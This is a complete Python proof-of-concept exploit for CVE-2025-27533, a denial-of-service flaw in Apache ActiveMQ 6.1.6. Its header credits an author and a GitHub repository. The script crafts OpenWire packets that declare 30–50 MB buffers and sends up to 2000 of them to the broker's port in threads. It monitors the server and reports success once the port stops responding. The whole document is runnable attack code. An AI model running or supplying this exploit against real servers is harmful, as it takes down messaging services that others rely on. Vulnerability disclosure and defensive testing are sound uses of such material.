# Exploit Title: Apache ActiveMQ 6.1.6 - Denial of Service (DOS)
# Date: 2025-05-9
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)
# Github: https://github.com/absholi7ly/CVE-2025-27533-Exploit-for-Apache-ActiveMQ
# CVE: CVE-2025-27533

import socket
import struct
import time
import datetime
import threading
import requests
import argparse
import random
from colorama import init, Fore
from tabulate import tabulate
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor

init()

def print_banner():
    banner = f"""
{Fore.CYAN}============================================================
        CVE-2025-27533 Exploit PoC - Apache ActiveMQ DoS
============================================================
{Fore.YELLOW}Developed by: absholi7ly
{Fore.CYAN}============================================================{Fore.RESET}
    """
    print(banner)

def _check_server_availability(host, port, admin_port=8161, timeout=2):
    """Internal function to check server availability"""
    tcp_reachable = False
    admin_reachable = False

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        sock.connect((host, port))
        sock.close()
        tcp_reachable = True
    except (socket.timeout, ConnectionRefusedError):
        pass

    try:
        response = requests.get(f"http://{host}:{admin_port}/admin", timeout=timeout)
        admin_reachable = response.status_code == 200
    except (requests.Timeout, requests.ConnectionError):
        pass

    return tcp_reachable, admin_reachable

def check_server_availability(host, port, admin_port=8161, timeout=2, retries=5):
    for _ in range(retries):
        tcp_reachable, admin_reachable = _check_server_availability(host, port, admin_port, timeout)
        if not tcp_reachable:
            return False, admin_reachable
        time.sleep(0.5)
    return True, admin_reachable

def parse_hex_or_int(value):
    try:
        if value.startswith('0x') or value.startswith('0X'):
            return int(value, 16)
        return int(value)
    except ValueError:
        raise ValueError(f"Invalid integer or hex value: {value}")

def create_malicious_packet(buffer_size=0x1E00000, packet_id=1):
    command_type = 0x01
    client_id = f"EXPLOIT-PACKET-{packet_id:04d}".encode()
    version = 12

    packet = bytearray()
    packet += b'\x00\x00\x00\x00'
    packet += struct.pack("B", command_type)
    packet += struct.pack(">I", len(client_id))
    packet += client_id
    packet += struct.pack(">I", version)
    packet += struct.pack(">I", buffer_size)
    packet += bytes(random.randint(0, 255) for _ in range(50))

    packet_length = len(packet) - 4
    packet[0:4] = struct.pack(">I", packet_length)

    return packet

def send_single_packet(host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event):
    if stop_event.is_set():
        return

    timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]
    tcp_reachable, admin_reachable = check_server_availability(host, port)
    status = f"TCP: {'Up' if tcp_reachable else 'Down'}, Admin: {'Up' if admin_reachable else 'Down'}"
    local_port = "N/A"
    connection_status = "Success"

    max_connect_retries = 5
    for connect_attempt in range(max_connect_retries):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

        try:
            sock.connect((host, port))
            local_port = sock.getsockname()[1]
            print(f"{Fore.GREEN}[+] Connected to {host}:{port} (Packet {packet_num}/{total_packets}, Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}")

            max_retries = 3
            for attempt in range(max_retries):
                try:
                    sock.send(packet)
                    print(f"{Fore.CYAN}[*] Sent Packet {packet_num}/{total_packets} (Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}")
                    try:
                        response = sock.recv(2048)
                        response_len = len(response)
                        connection_status = f"Success (Response: {response_len} bytes)"
                    except:
                        connection_status = "Success (No Response)"
                    break
                except socket.error as e:
                    connection_status = f"Failed: {str(e)}"
                    if attempt < max_retries - 1:
                        print(f"{Fore.YELLOW}[-] Failed to send Packet {packet_num}/{total_packets} (Attempt {attempt+1}, Port: {local_port}): {e}. Retrying...{Fore.RESET}")
                        time.sleep(0.5)
                        continue
                    else:
                        print(f"{Fore.RED}[-] Failed to send Packet {packet_num}/{total_packets} after {max_retries} attempts: {e}{Fore.RESET}")

            packet_status.append([packet_num, timestamp, status, local_port, f"Packet-{packet_num:04d}", connection_status])
            break

        except socket.timeout:
            print(f"{Fore.RED}[-] Connection timeout for Packet {packet_num}/{total_packets} (Port: {local_port}){Fore.RESET}")
            packet_status.append([packet_num, timestamp, "Connection Timeout", local_port, f"Packet-{packet_num:04d}", "Timeout"])
            break
        except socket.error as e:
            error_str = str(e)
            if "10053" in error_str:
                error_type = "Connection Reset"
            elif "timeout" in error_str:
                error_type = "Timeout"
            else:
                error_type = "Other"
            if "10053" in error_str and connect_attempt < max_connect_retries - 1:
                print(f"{Fore.YELLOW}[-] [WinError 10053] for Packet {packet_num}/{total_packets} (Attempt {connect_attempt+1}): {e}. Retrying connection...{Fore.RESET}")
                time.sleep(1)
                continue
            print(f"{Fore.RED}[-] Error connecting for Packet {packet_num}/{total_packets} (Port: {local_port}): {e}{Fore.RESET}")
            packet_status.append([packet_num, timestamp, f"Error: {error_type}", local_port, f"Packet-{packet_num:04d}", f"Error: {error_str}"])
            break

        finally:
            sock.close()

    packet = None

def send_packets(host, port, total_packets=2000, buffer_sizes=[0x1E00000, 0x3200000]):
    packet_status = []
    stop_event = threading.Event()
    max_threads = 2

    pbar = tqdm(total=total_packets, desc="Sending Packets", unit="packet")

    def monitor_server():
        while not stop_event.is_set():
            tcp_reachable, _ = check_server_availability(host, port)
            if not tcp_reachable:
                print(f"{Fore.GREEN}[+] Server TCP port {port} is down!{Fore.RESET}")
                stop_event.set()
                break
            time.sleep(1)

    monitor_thread = threading.Thread(target=monitor_server)
    monitor_thread.start()

    packet_num = 1
    with ThreadPoolExecutor(max_workers=max_threads) as executor:
        futures = []
        while packet_num <= total_packets and not stop_event.is_set():
            buffer_size = random.choice(buffer_sizes)
            packet = create_malicious_packet(buffer_size, packet_num)
            future = executor.submit(
                send_single_packet,
                host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event
            )
            futures.append(future)
            packet_num += 1
            pbar.update(1)
            time.sleep(random.uniform(0.3, 0.5))

            if packet_num % 50 == 0:
                tcp_reachable, _ = check_server_availability(host, port)
                time.sleep(2)
                if not tcp_reachable:
                    print(f"{Fore.GREEN}[+] Server TCP port {port} is down!{Fore.RESET}")
                    stop_event.set()
                    break
                print(f"{Fore.MAGENTA}[*] {packet_num} packets sent,{Fore.RESET}")

    pbar.close()
    stop_event.set()
    monitor_thread.join()

    packet_status.sort(key=lambda x: x[0])

    total_sent = len(packet_status)
    successful = sum(1 for p in packet_status if p[5].startswith("Success"))
    failed = total_sent - successful

    print(f"\n{Fore.CYAN}[*] Packet Status Table:{Fore.RESET}")
    print(tabulate(
        packet_status,
        headers=["Packet #", "Timestamp", "Server Status", "Local Port", "Packet ID", "Connection"],
        tablefmt="fancy_grid",
        stralign="center",
        numalign="center"
    ))

    print(f"\n{Fore.CYAN}[*] Exploit Statistics:{Fore.RESET}")
    print(f"  - Total Packets Sent: {total_sent}")
    print(f"  - Successful Packets: {successful} ({successful/total_sent*100:.2f}%)")
    print(f"  - Failed Packets: {failed} ({failed/total_sent*100:.2f}%)")

    tcp_reachable, admin_reachable = check_server_availability(host, port)
    print(f"\n{Fore.CYAN}[*] Final Server Status:{Fore.RESET}")
    if not tcp_reachable:
        print(f"{Fore.GREEN}[+] Exploit Successful: TCP port {port} is down!{Fore.RESET}")
    else:
        print(f"{Fore.YELLOW}[-] Exploit Incomplete: TCP port {port} still up.{Fore.RESET}")

    return packet_status

def main():
    print_banner()

    parser = argparse.ArgumentParser(description="CVE-2025-27533 Exploit PoC for Apache ActiveMQ")
    parser.add_argument("--host", default="127.0.0.1", help="Target IP address")
    parser.add_argument("--port", type=int, default=61616, help="OpenWire port")
    parser.add_argument("--total-packets", type=int, default=2000, help="Total packets to send")
    parser.add_argument("--buffer-sizes", type=parse_hex_or_int, nargs='+', default=[0x1E00000, 0x3200000],
                        help="Buffer sizes in bytes (decimal or hex)")

    args = parser.parse_args()

    print(f"{Fore.CYAN}[*] Exploit Configuration:{Fore.RESET}")
    print(f"  - Target: {args.host}:{args.port}")
    print(f"  - Total Packets: {args.total_packets}")
    print(f"  - Buffer Sizes: {[f'{size:#x} ({size // (1024*1024)} MB)' for size in args.buffer_sizes]}")

    print(f"\n{Fore.CYAN}[*] Sending malicious packets...{Fore.RESET}")
    packet_status = send_packets(args.host, args.port, args.total_packets, args.buffer_sizes)

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print(f"{Fore.RED}[-] Program interrupted by user.{Fore.RESET}")